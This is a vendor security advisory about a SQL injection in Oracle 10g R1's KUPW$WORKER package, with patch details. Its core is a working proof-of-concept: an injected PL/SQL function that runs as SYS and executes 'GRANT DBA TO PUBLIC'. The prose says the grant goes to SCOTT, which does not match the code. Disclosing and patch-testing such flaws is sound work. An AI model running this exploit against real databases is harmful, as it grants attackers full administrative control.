Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1
Name
SQL Injection via Oracle
KUPW$WORKER in Oracle 10g R1
Systems Affected
Oracle 10g R1
Severity
High Risk
Category
SQL Injection
Credit
Alexander Kornbrust
Date
17 Nov 2006 (V 1.00)
Details
The following proof of concept exploit code injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT.
Example
-- Create a function first and inject this function. The function will be executed as user SYS.
CREATE OR REPLACE FUNCTION F return number
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
COMMIT;
RETURN 1;
END;
/
-- Inject the function in the vulnerable procedure
exec sys.kupw$WORKER.main('x','YY'' and 1=d.f -- r6');
Patch Information
Apply the patches mentioned in Oracle Critical Patch Update July 2006.
ゥ 2005 by Red-Database-Security GmbH - last update 17-nov-2005
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.